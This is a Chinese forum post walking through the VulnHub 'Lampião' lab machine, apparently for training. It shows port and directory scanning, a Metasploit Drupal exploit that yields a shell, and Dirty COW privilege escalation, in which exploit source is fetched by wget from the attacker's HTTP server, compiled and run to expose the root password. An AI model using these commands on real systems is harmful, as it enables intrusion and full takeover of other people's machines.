电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 486 人浏览分享

Lampião打靶记录

[复制链接]
486 0
一、前期准备

1.下载地址

https://www.vulnhub.com/entry/lampiao-1,249/#download

1665325135_6342d84f1a6f84cc7c8e0.png

2、导入

1665325275_6342d8db2c4d4c5a03ef4.png

3、网络设置

桥接至物理网卡后启动。

1665325385_6342d949b831ad8a6baad.png

二、信息收集

1、发现靶场ip

6666888.png

666687.png

2、全端口扫描

nmap -Pn -p 0-65535 -O 192.168.0.101

666686.png

3、目录扫描

python3 dirsearch.py -u http://192.168.0.101:1898/-x 403

python3 dirsearch.py -u http://192.168.0.101

66685.png

66684.png

4、发现敏感信息

访问特殊文件,发现爆出drupal框架版本

http://192.168.0.101:1898/CHANGELOG.txt

66683.png

信息收集:drupal

Drupal是使用PHP语言编写的开源内容管理框架(CMF)

漏洞查询:查询后发现存在大量的版本漏洞

三、漏洞利用

1、启动msfconsole

搜索Drupal漏洞exp

search drupal

66682.png

2、根据信息收集

根据版本进行漏洞测试

show option #查看参数
set rhost 192.168.0.101 # 服务远程ip
set rport 1898 # 服务端口
exploit #启动

66681.png

利用成功。获取shell

66680.png

四、提权

1、信息收集

uname -a

66669.png

第一个版本Ubuntu 4.10即发行于2004年10月20日

尝试使用脏牛提权。

上传提权漏洞检测脚本。

66668.png

2、漏洞检测脚本执行

chmod +777 1.sh

/1.sh

66667.png

3、发现脏牛漏洞

脏牛漏洞利用简单,利用成功率高

寻找提权脚本
searchsploit dirty  #查看脚本
locate   linux/local/40847.cpp   #寻找脚本所在位置
scp /usr/share/exploitdb/exploits/linux/local/40847.cpp  /tmp #复制文件到 /tmp

66663.png

python3 -m http.server 800 #启用http服务

66662.png

wget http://192.168.0.110:800/40847.cpp  #下载文件
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil   # 编译文件
chmod +777 40847
./40847z

4、执行成功

显示密码

66661.png

5、连接:

ssh root@192.168.0.104

66659.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.